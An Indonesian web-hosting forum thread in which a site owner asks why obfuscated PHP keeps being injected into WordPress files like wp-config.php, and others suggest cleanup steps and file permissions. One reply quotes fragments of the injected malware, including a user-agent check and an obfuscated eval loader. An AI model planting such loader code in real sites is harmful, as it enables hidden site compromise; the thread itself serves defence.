File Wordpress Di-Inject Malicious Code

Zhad · 3 Jun 2015

Hi Rekan-rekan DWH
Salah satu akun di DS saya, websitenya berbasis website, dan file-file pentingnya diinject kode aneh di awal baris kode file.
Plugin jadi ga kedetek dari dashboard.
Kode2 ini ada di php2 pilar wordpress kayak wp-config.php

Kodenya :

Sudah direstore ke normal
Update Salt, WP, Theme, Plugin
Kena2 lagi

Kenapa ya?

Trims

Zhad · 3 Jun 2015

Ini kode yang diinjek

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER[ ....

BikinDesainSitus · 3 Jun 2015

saran saya.

export tulisan dan page via dashbord
copy / download file image di wp-content (Pastikan benar2 file image)
hapus seluruh file
install ulang
install plugin itthemes security (dengan segala settingnya)
import hasila export tadi
upload file image wp-content

done...

backup !!

mustafaramadhan · 3 Jun 2015

Lihat ke http://ddecode.com/hexdecoder/

dhyhost · 3 Jun 2015

wp-config, biar aman coba diganti aja permissionnya ke 440 atau 400

slepetan · 3 Jun 2015

penasaran.. kira2 apa yang dilakukan script ini ya? :39:

Yang awal:

Code:

<?php
if (!isset($GLOBALS["anuna"])) {
    $ua = strtolower($_SERVER["HTTP_USER_AGENT"]);
    if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1;
}
?>

yang akhir..

Code:

$gubpbmvvqg = substr($rbzjgsiwbp, (45484 - 35378), (32 - 25));
if (!function_exists('hlzppruxlh')) {
    function hlzppruxlh($qvwxxucpoi, $jmqimpctxe) {
        $lbtiwvkexa = NULL;
        for ($xsnvcjahjp = 0;$xsnvcjahjp < (sizeof($qvwxxucpoi) / 2);$xsnvcjahjp++) {
            $lbtiwvkexa.= substr($jmqimpctxe, $qvwxxucpoi[($xsnvcjahjp * 2) ], $qvwxxucpoi[($xsnvcjahjp * 2) + 1]);
        }
        return $lbtiwvkexa;
    };
}
$fmdfhaflgb = " /* zsphxgrgor */ eval(str_replace(chr((153-116)), chr((517-425)), hlzppruxlh($hnoyopqjwg,$rbzjgsiwbp))); /* qdwduicxmi */ ";
$syumqqgzyd = substr($rbzjgsiwbp, (44524 - 34411), (64 - 52));
$syumqqgzyd($gubpbmvvqg, $fmdfhaflgb, NULL);
$syumqqgzyd = $fmdfhaflgb;
$syumqqgzyd = (525 - 404);
$rbzjgsiwbp = $syumqqgzyd - 1;
?>

Bagian tengah masih menjadi misteri.. :39:

Zhad · 4 Jun 2015

BikinDesainSitus said:
saran saya.

export tulisan dan page via dashbord

copy / download file image di wp-content (Pastikan benar2 file image)

hapus seluruh file

install ulang

install plugin itthemes security (dengan segala settingnya)

import hasila export tadi

upload file image wp-content

done...

backup !!

File image itu seperti apa ya?
di wp-content juga pada kena inject

mustafaramadhan said:
Lihat ke http://ddecode.com/hexdecoder/

Hasilnya seperti ini pak -> http://www.diskusiwebhosting.com/threads/file-wordpress-di-inject-malicious-code.16820/#post-144429

Cuma ga ngarti itu kode ngapain

dhyhost said:
wp-config, biar aman coba diganti aja permissionnya ke 440 atau 400

Kalau file-file lain permissionnya berapa? Std kan 755

mustafaramadhan · 4 Jun 2015

Coba baca http://stackoverflow.com/questions/25996752/removing-a-string-in-a-php-file-with-start-and-end dan http://security.stackexchange.com/questions/70579/is-this-a-backdoor

dhyhost · 4 Jun 2015

Zhad said:
Kalau file-file lain permissionnya berapa? Std kan 755

yang lain dibikin biasa saja, folder 755 dan file 644
https://codex.wordpress.org/Changing_File_Permissions

Zhad · 4 Jun 2015

@^ udah sih habis restore ulang, tapi kena lagi, uniknya last modified di cpanel, ga berubah, tapi filenya udah diinject kode2 tersebut

File Wordpress Di-Inject Malicious Code

Zhad

Poster 1.0

Zhad

Poster 1.0

Attachments

BikinDesainSitus

Hosting Guru

mustafaramadhan

Hosting Guru

dhyhost

Web Hosting Service

slepetan

Beginner 2.0

Zhad

Poster 1.0

mustafaramadhan

Hosting Guru

dhyhost

Web Hosting Service

Zhad

Poster 1.0